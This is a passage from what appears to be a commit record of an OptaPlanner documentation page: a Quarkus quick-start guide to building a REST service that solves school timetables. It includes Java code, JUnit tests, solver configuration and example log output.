= new Lesson(2, \"Subject2\", \"Teacher2\", \"Group2\");\n Lesson nonConflictingLesson = new Lesson(3, \"Subject3\", \"Teacher3\", \"Group3\");\n\n firstLesson.setRoom(ROOM);\n firstLesson.setTimeslot(TIMESLOT1);\n\n conflictingLesson.setRoom(ROOM);\n conflictingLesson.setTimeslot(TIMESLOT1);\n\n nonConflictingLesson.setRoom(ROOM);\n nonConflictingLesson.setTimeslot(TIMESLOT2);\n\n constraintVerifier.verifyThat(TimeTableConstraintProvider::roomConflict)\n .given(firstLesson, conflictingLesson, nonConflictingLesson)\n .penalizesBy(1);\n }\n\n}\n----\n\nThis test verifies that the constraint `TimeTableConstraintProvider::roomConflict`,\nwhen given three lessons in the same room, where two lessons have the same timeslot,\nit penalizes with a match weight of `1`.\nSo with a constraint weight of `10hard` it would reduce the score by `-10hard`.\n\nNotice how `ConstraintVerifier` ignores the constraint weight during testing - even\nif those constraint weights are hard coded in the `ConstraintProvider` - because\nconstraints weights change regularly before going into production.\nThis way, constraint weight tweaking does not break the unit tests.\n\n==== Test the solver\n\nIn a JUnit test, generate a test dataset and send it to the `TimeTableResource` to solve.\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResourceTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.rest.TimeTableResource;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solve() {\n TimeTable problem = generateProblem();\n TimeTable solution = timeTableResource.solve(problem);\n assertFalse(solution.getLessonList().isEmpty());\n for (Lesson lesson : solution.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(solution.getScore().isFeasible());\n }\n\n private TimeTable generateProblem() {\n List<Timeslot> timeslotList = new ArrayList<>();\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(8, 30), LocalTime.of(9, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9, 30), LocalTime.of(10, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(10, 30), LocalTime.of(11, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(13, 30), LocalTime.of(14, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(14, 30), LocalTime.of(15, 30)));\n\n List<Room> roomList = new ArrayList<>();\n roomList.add(new Room(\"Room A\"));\n roomList.add(new Room(\"Room B\"));\n roomList.add(new Room(\"Room C\"));\n\n List<Lesson> lessonList = new ArrayList<>();\n lessonList.add(new Lesson(101L, \"Math\", \"B. May\", \"9th grade\"));\n lessonList.add(new Lesson(102L, \"Physics\", \"M. Curie\", \"9th grade\"));\n lessonList.add(new Lesson(103L, \"Geography\", \"M. Polo\", \"9th grade\"));\n lessonList.add(new Lesson(104L, \"English\", \"I. Jones\", \"9th grade\"));\n lessonList.add(new Lesson(105L, \"Spanish\", \"P. Cruz\", \"9th grade\"));\n\n lessonList.add(new Lesson(201L, \"Math\", \"B. May\", \"10th grade\"));\n lessonList.add(new Lesson(202L, \"Chemistry\", \"M. Curie\", \"10th grade\"));\n lessonList.add(new Lesson(203L, \"History\", \"I. Jones\", \"10th grade\"));\n lessonList.add(new Lesson(204L, \"English\", \"P. Cruz\", \"10th grade\"));\n lessonList.add(new Lesson(205L, \"French\", \"M. Curie\", \"10th grade\"));\n return new TimeTable(timeslotList, roomList, lessonList);\n }\n\n}\n----\n\nThis test verifies that after solving, all lessons are assigned to a time slot and a room.\nIt also verifies that it found a feasible solution (no hard constraints broken).\n\nAdd test properties to the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\nquarkus.optaplanner.solver.termination.spent-limit=5s\n\n# Effectively disable spent-time termination in favor of the best-score-limit\n%test.quarkus.optaplanner.solver.termination.spent-limit=1h\n%test.quarkus.optaplanner.solver.termination.best-score-limit=0hard\/*soft\n----\n\nNormally, the solver finds a feasible solution in less than 200 milliseconds.\nNotice how the `application.properties` overwrites the solver termination during tests\nto terminate as soon as a feasible solution (`0hard\/*soft`) is found.\nThis avoids hard coding a solver time, because the unit test might run on arbitrary hardware.\nThis approach ensures that the test runs long enough to find a feasible solution, even on slow machines.\nBut it does not run a millisecond longer than it strictly must, even on fast machines.\n\n=== Logging\n\nWhen adding constraints in your `ConstraintProvider`,\nkeep an eye on the _score calculation speed_ in the `info` log,\nafter solving for the same amount of time, to assess the performance impact:\n\n[source]\n----\n... Solving ended: ..., score calculation speed (29455\/sec), ...\n----\n\nTo understand how OptaPlanner is solving your problem internally,\nchange the logging in the `application.properties` file or with a `-D` system property:\n\n[source,properties]\n----\nquarkus.log.category.\"org.optaplanner\".level=debug\n----\n\nUse `debug` logging to show every _step_:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (67), best score (-20init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... CH step (0), time spent (128), score (-18init\/0hard\/0soft), selected move count (15), picked move ([Math(101) {null -> Room A}, Math(101) {null -> MONDAY 08:30}]).\n... CH step (1), time spent (145), score (-16init\/0hard\/0soft), selected move count (15), picked move ([Physics(102) {null -> Room A}, Physics(102) {null -> MONDAY 09:30}]).\n...\n----\n\nUse `trace` logging to show every _step_ and every _move_ per step.\n\n== Summary\n\nCongratulations!\nYou have just developed a Quarkus application with https:\/\/www.optaplanner.org\/[OptaPlanner]!\n\n== Further improvements: Database and UI integration\n\nNow try adding database and UI integration:\n\n. Store `Timeslot`, `Room`, and `Lesson` in the database with https:\/\/quarkus.io\/guides\/hibernate-orm-panache[Hibernate and Panache].\n\n. https:\/\/quarkus.io\/guides\/rest-json[Expose them through REST].\n\n. Adjust the `TimeTableResource` to read and write a `TimeTable` instance in a single transaction\nand use those accordingly:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport io.quarkus.panache.common.Sort;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.optaplanner.core.api.score.ScoreManager;\nimport org.optaplanner.core.api.score.buildin.hardsoft.HardSoftScore;\nimport org.optaplanner.core.api.solver.SolverManager;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n public static final Long SINGLETON_TIME_TABLE_ID = 1L;\n\n @Inject\n SolverManager<TimeTable, Long> solverManager;\n @Inject\n ScoreManager<TimeTable, HardSoftScore> scoreManager;\n\n \/\/ To try, open http:\/\/localhost:8080\/timeTable\n @GET\n public TimeTable getTimeTable() {\n \/\/ Get the solver status before loading the solution\n \/\/ to avoid the race condition that the solver terminates between them\n SolverStatus solverStatus = getSolverStatus();\n TimeTable solution = findById(SINGLETON_TIME_TABLE_ID);\n scoreManager.updateScore(solution); \/\/ Sets the score\n solution.setSolverStatus(solverStatus);\n return solution;\n }\n\n @POST\n @Path(\"\/solve\")\n public void solve() {\n solverManager.solveAndListen(SINGLETON_TIME_TABLE_ID,\n this::findById,\n this::save);\n }\n\n public SolverStatus getSolverStatus() {\n return solverManager.getSolverStatus(SINGLETON_TIME_TABLE_ID);\n }\n\n @POST\n @Path(\"\/stopSolving\")\n public void stopSolving() {\n solverManager.terminateEarly(SINGLETON_TIME_TABLE_ID);\n }\n\n @Transactional\n protected TimeTable findById(Long id) {\n if (!SINGLETON_TIME_TABLE_ID.equals(id)) {\n throw new IllegalStateException(\"There is no timeTable with id (\" + id + \").\");\n }\n \/\/ Occurs in a single transaction, so each initialized lesson references the same timeslot\/room instance\n \/\/ that is contained by the timeTable's timeslotList\/roomList.\n return new TimeTable(\n Timeslot.listAll(Sort.by(\"dayOfWeek\").and(\"startTime\").and(\"endTime\").and(\"id\")),\n Room.listAll(Sort.by(\"name\").and(\"id\")),\n Lesson.listAll(Sort.by(\"subject\").and(\"teacher\").and(\"studentGroup\").and(\"id\")));\n }\n\n @Transactional\n protected void save(TimeTable timeTable) {\n for (Lesson lesson : timeTable.getLessonList()) {\n \/\/ TODO this is awfully naive: optimistic locking causes issues if called by the SolverManager\n Lesson attachedLesson = Lesson.findById(lesson.getId());\n attachedLesson.setTimeslot(lesson.getTimeslot());\n attachedLesson.setRoom(lesson.getRoom());\n }\n }\n\n}\n----\n+\nFor simplicity's sake, this code handles only one `TimeTable` instance,\nbut it is straightforward to enable multi-tenancy and handle multiple `TimeTable` instances of different high schools in parallel.\n+\nThe `getTimeTable()` method returns the latest timetable from the database.\nIt uses the `ScoreManager` (which is automatically injected)\nto calculate the score of that timetable, so the UI can show the score.\n+\nThe `solve()` method starts a job to solve the current timetable and store the time slot and room assignments in the database.\nIt uses the `SolverManager.solveAndListen()` method to listen to intermediate best solutions\nand update the database accordingly.\nThis enables the UI to show progress while the backend is still solving.\n\n. Adjust the `TimeTableResourceTest` instance accordingly, now that the `solve()` method returns immediately.\nPoll for the latest solution until the solver finishes solving:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solveDemoDataUntilFeasible() throws InterruptedException {\n timeTableResource.solve();\n TimeTable timeTable = timeTableResource.getTimeTable();\n while (timeTable.getSolverStatus() != SolverStatus.NOT_SOLVING) {\n \/\/ Quick polling (not a Test Thread Sleep anti-pattern)\n \/\/ Test is still fast on fast machines and doesn't randomly fail on slow machines.\n Thread.sleep(20L);\n timeTable = timeTableResource.getTimeTable();\n }\n assertFalse(timeTable.getLessonList().isEmpty());\n for (Lesson lesson : timeTable.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(timeTable.getScore().isFeasible());\n }\n\n}\n----\n\n. Build an attractive web UI on top of these REST methods to visualize the timetable.\n\nTake a look at {quarkusQuickstartUrl}[the quickstart source code] to see how this all turns out.\n","old_contents":"[[quarkusJavaQuickStart]]\n= Quarkus Java quick start\n:doctype: book\n:imagesdir: ..\/..\n:sectnums:\n:icons: font\n:quickstartsCloneUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\n:quickstartsArchiveUrl: https:\/\/www.optaplanner.org\/download\/download.html\n:quarkusQuickstartUrl: https:\/\/github.com\/kiegroup\/optaplanner-quickstarts\/tree\/stable\/use-cases\/school-timetabling\n\n\/\/ Keep this in sync with the quarkus repo's copy\n\/\/ https:\/\/github.com\/quarkusio\/quarkus\/blob\/main\/docs\/src\/main\/asciidoc\/optaplanner.adoc\n\/\/ Keep this also in sync with spring-boot-quickstart.adoc where applicable\n\nThis guide walks you through the process of creating a https:\/\/quarkus.io\/[Quarkus] application\nwith https:\/\/www.optaplanner.org\/[OptaPlanner]'s constraint solving Artificial Intelligence (AI).\n\n== What you will build\n\nYou will build a REST application that optimizes a school timetable for students and teachers:\n\nimage::quickstart\/school-timetabling\/schoolTimetablingScreenshot.png[]\n\nYour service will assign `Lesson` instances to `Timeslot` and `Room` instances automatically\nby using AI to adhere to hard and soft scheduling _constraints_, such as the following examples:\n\n* A room can have at most one lesson at the same time.\n* A teacher can teach at most one lesson at the same time.\n* A student can attend at most one lesson at the same time.\n* A teacher prefers to teach all lessons in the same room.\n* A teacher prefers to teach sequential lessons and dislikes gaps between lessons.\n* A student dislikes sequential lessons on the same subject.\n\nMathematically speaking, school timetabling is an _NP-hard_ problem.\nThis means it is difficult to scale.\nSimply brute force iterating through all possible combinations takes millions of years\nfor a non-trivial dataset, even on a supercomputer.\nLuckily, AI constraint solvers such as OptaPlanner have advanced algorithms\nthat deliver a near-optimal solution in a reasonable amount of time.\n\n== Solution source code\n\nFollow the instructions in the next sections to create the application step by step (recommended).\n\nAlternatively, you can also skip right to the completed example:\n\n. Clone the Git repository:\n+\n[source,shell,subs=attributes+]\n----\n$ git clone {quickstartsCloneUrl}\n----\n+\nor download an {quickstartsArchiveUrl}[archive].\n\n. Find the solution in {quarkusQuickstartUrl}[the `use-cases` directory]\nand run it (see its README file).\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* https:\/\/adoptopenjdk.net\/[JDK] {java-version}+ with `JAVA_HOME` configured appropriately\n* https:\/\/maven.apache.org\/download.html[Apache Maven] {maven-version}+ or https:\/\/gradle.org\/install\/[Gradle] 4+\n* An IDE, such as https:\/\/www.jetbrains.com\/idea[IntelliJ IDEA], VSCode or Eclipse\n\n== The build file and the dependencies\n\nUse https:\/\/code.quarkus.io\/[code.quarkus.io] to generate an application\nwith the following extensions, for Maven or Gradle:\n\n* RESTEasy JAX-RS (`quarkus-resteasy`)\n* RESTEasy Jackson (`quarkus-resteasy-jackson`)\n* OptaPlanner (`optaplanner-quarkus`)\n* OptaPlanner Jackson (`optaplanner-quarkus-jackson`)\n\nAlternatively, generate it from the command line with Maven:\n\n[source,shell,subs=attributes+]\n----\n$ mvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=optaplanner-quickstart \\\n -Dextensions=\"resteasy,resteasy-jackson,optaplanner-quarkus,optaplanner-quarkus-jackson\" \\\n -DnoExamples\n$ cd optaplanner-quickstart\n----\n\nIn Maven, your `pom.xml` file contains these dependencies:\n\n[source,xml,subs=attributes+]\n----\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-universe-bom<\/artifactId>\n <version>{quarkus-version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n <\/dependencies>\n <\/dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-jackson<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus<\/artifactId>\n <\/dependency>\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-quarkus-jackson<\/artifactId>\n <\/dependency>\n\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-junit5<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n <\/dependencies>\n----\n\n\/\/On the other hand, in Gradle, your `build.gradle` file contains these dependencies:\n\/\/\n\/\/[source,groovy,subs=attributes+]\n\/\/----\n\/\/dependencies {\n\/\/ implementation enforcedPlatform(\"io.quarkus:quarkus-universe-bom:{quarkus-version}\")\n\/\/ implementation 'io.quarkus:quarkus-resteasy'\n\/\/ implementation 'io.quarkus:quarkus-resteasy-jackson'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus'\n\/\/ implementation 'org.optaplanner:optaplanner-quarkus-jackson'\n\/\/\n\/\/ testImplementation 'io.quarkus:quarkus-junit5'\n\/\/}\n\/\/----\n\ninclude::..\/school-timetabling\/school-timetabling-model.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-constraints.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-solution.adoc[leveloffset=+1]\n\n== Create the solver service\n\nNow you are ready to put everything together and create a REST service.\nBut solving planning problems on REST threads causes HTTP timeout issues.\nTherefore, the Quarkus extension injects a `SolverManager` instance,\nwhich runs solvers in a separate thread pool\nand can solve multiple datasets in parallel.\n\nCreate the `src\/main\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResource.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.util.UUID;\nimport java.util.concurrent.ExecutionException;\nimport javax.inject.Inject;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.optaplanner.core.api.solver.SolverJob;\nimport org.optaplanner.core.api.solver.SolverManager;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n @Inject\n SolverManager<TimeTable, UUID> solverManager;\n\n @POST\n @Path(\"\/solve\")\n public TimeTable solve(TimeTable problem) {\n UUID problemId = UUID.randomUUID();\n \/\/ Submit the problem to start solving\n SolverJob<TimeTable, UUID> solverJob = solverManager.solve(problemId, problem);\n TimeTable solution;\n try {\n \/\/ Wait until the solving ends\n solution = solverJob.getFinalBestSolution();\n } catch (InterruptedException | ExecutionException e) {\n throw new IllegalStateException(\"Solving failed.\", e);\n }\n return solution;\n }\n\n}\n----\n\nFor simplicity's sake, this initial implementation waits for the solver to finish,\nwhich can still cause an HTTP timeout.\nThe _complete_ implementation avoids HTTP timeouts much more elegantly.\n\n== Set the termination time\n\nWithout a termination setting or a `terminationEarly()` event, the solver runs forever.\nTo avoid that, limit the solving time to five seconds.\nThat is short enough to avoid the HTTP timeout.\n\nCreate the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\n# The solver runs only for 5 seconds to avoid a HTTP timeout in this simple implementation.\n# It's recommended to run for at least 5 minutes (\"5m\") otherwise.\nquarkus.optaplanner.solver.termination.spent-limit=5s\n----\n\nOptaPlanner returns _the best solution_ found in the available termination time.\nDue to xref:optimization-algorithms\/optimization-algorithms.adoc#doesPlannerFindTheOptimalSolution[the nature of NP-hard problems],\nthe best solution might not be optimal, especially for larger datasets.\nIncrease the termination time to potentially find a better solution.\n\n== Run the application\n\nFirst start the application:\n\n[source,shell]\n----\n$ mvn compile quarkus:dev\n----\n\n=== Try the application\n\nNow that the application is running, you can test the REST service.\nYou can use any REST client you wish.\nThe following example uses the Linux command `curl` to send a POST request:\n\n[source,shell]\n----\n$ curl -i -X POST http:\/\/localhost:8080\/timeTable\/solve -H \"Content-Type:application\/json\" -d '{\"timeslotList\":[{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"}],\"roomList\":[{\"name\":\"Room A\"},{\"name\":\"Room B\"}],\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\"},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\"},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\"},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. Jones\",\"studentGroup\":\"10th grade\"}]}'\n----\n\nAfter about five seconds, according to the termination spent time defined in your `application.properties`,\nthe service returns an output similar to the following example:\n\n[source]\n----\nHTTP\/1.1 200\nContent-Type: application\/json\n...\n\n{\"timeslotList\":...,\"roomList\":...,\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room B\"}},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. Jones\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room B\"}}],\"score\":\"0hard\/0soft\"}\n----\n\nNotice that your application assigned all four lessons to one of the two time slots and one of the two rooms.\nAlso notice that it conforms to all hard constraints.\nFor example, M. Curie's two lessons are in different time slots.\n\nOn the server side, the `info` log shows what OptaPlanner did in those five seconds:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (33), best score (-8init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... Construction Heuristic phase (0) ended: time spent (73), best score (0hard\/0soft), score calculation speed (459\/sec), step total (4).\n... Local Search phase (1) ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28949\/sec), step total (28398).\n... Solving ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28524\/sec), phase total (2), environment mode (REPRODUCIBLE).\n----\n\n=== Test the application\n\nA good application includes test coverage.\n\n==== Test the constraints\n\nTo test each constraint in isolation, use a `ConstraintVerifier` in unit tests.\nIt tests each constraint's corner cases in isolation from the other tests,\nwhich lowers maintenance when adding a new constraint with proper test coverage.\n\nAdd a `optaplanner-test` dependency in your `pom.xml`:\n[source,xml]\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-test<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/solver\/TimeTableConstraintProviderTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.solver;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.junit.jupiter.api.Test;\nimport org.optaplanner.test.api.score.stream.ConstraintVerifier;\n\n@QuarkusTest\nclass TimeTableConstraintProviderTest {\n\n private static final Room ROOM = new Room(\"Room1\");\n private static final Timeslot TIMESLOT1 = new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9,0), LocalTime.NOON);\n private static final Timeslot TIMESLOT2 = new Timeslot(DayOfWeek.TUESDAY, LocalTime.of(9,0), LocalTime.NOON);\n\n @Inject\n ConstraintVerifier<TimeTableConstraintProvider, TimeTable> constraintVerifier;\n\n @Test\n void roomConflict() {\n Lesson firstLesson = new Lesson(1, \"Subject1\", \"Teacher1\", \"Group1\");\n Lesson conflictingLesson = new Lesson(2, \"Subject2\", \"Teacher2\", \"Group2\");\n Lesson nonConflictingLesson = new Lesson(3, \"Subject3\", \"Teacher3\", \"Group3\");\n\n firstLesson.setRoom(ROOM);\n firstLesson.setTimeslot(TIMESLOT1);\n\n conflictingLesson.setRoom(ROOM);\n conflictingLesson.setTimeslot(TIMESLOT1);\n\n nonConflictingLesson.setRoom(ROOM);\n nonConflictingLesson.setTimeslot(TIMESLOT2);\n\n constraintVerifier.verifyThat(TimeTableConstraintProvider::roomConflict)\n .given(firstLesson, conflictingLesson, nonConflictingLesson)\n .penalizesBy(1);\n }\n\n}\n----\n\nThis test verifies that the constraint `TimeTableConstraintProvider::roomConflict`,\nwhen given three lessons in the same room, where two lessons have the same timeslot,\nit penalizes with a match weight of `1`.\nSo with a constraint weight of `10hard` it would reduce the score by `-10hard`.\n\nNotice how `ConstraintVerifier` ignores the constraint weight during testing - even\nif those constraint weights are hard coded in the `ConstraintProvider` - because\nconstraints weights change regularly before going into production.\nThis way, constraint weight tweaking does not break the unit tests.\n\n==== Test the solver\n\nIn a JUnit test, generate a test dataset and send it to the `TimeTableResource` to solve.\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResourceTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.rest.TimeTableResource;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solve() {\n TimeTable problem = generateProblem();\n TimeTable solution = timeTableResource.solve(problem);\n assertFalse(solution.getLessonList().isEmpty());\n for (Lesson lesson : solution.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(solution.getScore().isFeasible());\n }\n\n private TimeTable generateProblem() {\n List<Timeslot> timeslotList = new ArrayList<>();\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(8, 30), LocalTime.of(9, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9, 30), LocalTime.of(10, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(10, 30), LocalTime.of(11, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(13, 30), LocalTime.of(14, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(14, 30), LocalTime.of(15, 30)));\n\n List<Room> roomList = new ArrayList<>();\n roomList.add(new Room(\"Room A\"));\n roomList.add(new Room(\"Room B\"));\n roomList.add(new Room(\"Room C\"));\n\n List<Lesson> lessonList = new ArrayList<>();\n lessonList.add(new Lesson(101L, \"Math\", \"B. May\", \"9th grade\"));\n lessonList.add(new Lesson(102L, \"Physics\", \"M. Curie\", \"9th grade\"));\n lessonList.add(new Lesson(103L, \"Geography\", \"M. Polo\", \"9th grade\"));\n lessonList.add(new Lesson(104L, \"English\", \"I. Jones\", \"9th grade\"));\n lessonList.add(new Lesson(105L, \"Spanish\", \"P. Cruz\", \"9th grade\"));\n\n lessonList.add(new Lesson(201L, \"Math\", \"B. May\", \"10th grade\"));\n lessonList.add(new Lesson(202L, \"Chemistry\", \"M. Curie\", \"10th grade\"));\n lessonList.add(new Lesson(203L, \"History\", \"I. Jones\", \"10th grade\"));\n lessonList.add(new Lesson(204L, \"English\", \"P. Cruz\", \"10th grade\"));\n lessonList.add(new Lesson(205L, \"French\", \"M. Curie\", \"10th grade\"));\n return new TimeTable(timeslotList, roomList, lessonList);\n }\n\n}\n----\n\nThis test verifies that after solving, all lessons are assigned to a time slot and a room.\nIt also verifies that it found a feasible solution (no hard constraints broken).\n\nAdd test properties to the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\nquarkus.optaplanner.solver.termination.spent-limit=5s\n\n# Effectively disable spent-time termination in favor of the best-score-limit\n%test.quarkus.optaplanner.solver.termination.spent-limit=1h\n%test.quarkus.optaplanner.solver.termination.best-score-limit=0hard\/*soft\n----\n\nNormally, the solver finds a feasible solution in less than 200 milliseconds.\nNotice how the `application.properties` overwrites the solver termination during tests\nto terminate as soon as a feasible solution (`0hard\/*soft`) is found.\nThis avoids hard coding a solver time, because the unit test might run on arbitrary hardware.\nThis approach ensures that the test runs long enough to find a feasible solution, even on slow machines.\nBut it does not run a millisecond longer than it strictly must, even on fast machines.\n\n=== Logging\n\nWhen adding constraints in your `ConstraintProvider`,\nkeep an eye on the _score calculation speed_ in the `info` log,\nafter solving for the same amount of time, to assess the performance impact:\n\n[source]\n----\n... Solving ended: ..., score calculation speed (29455\/sec), ...\n----\n\nTo understand how OptaPlanner is solving your problem internally,\nchange the logging in the `application.properties` file or with a `-D` system property:\n\n[source,properties]\n----\nquarkus.log.category.\"org.optaplanner\".level=debug\n----\n\nUse `debug` logging to show every _step_:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (67), best score (-20init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... CH step (0), time spent (128), score (-18init\/0hard\/0soft), selected move count (15), picked move ([Math(101) {null -> Room A}, Math(101) {null -> MONDAY 08:30}]).\n... CH step (1), time spent (145), score (-16init\/0hard\/0soft), selected move count (15), picked move ([Physics(102) {null -> Room A}, Physics(102) {null -> MONDAY 09:30}]).\n...\n----\n\nUse `trace` logging to show 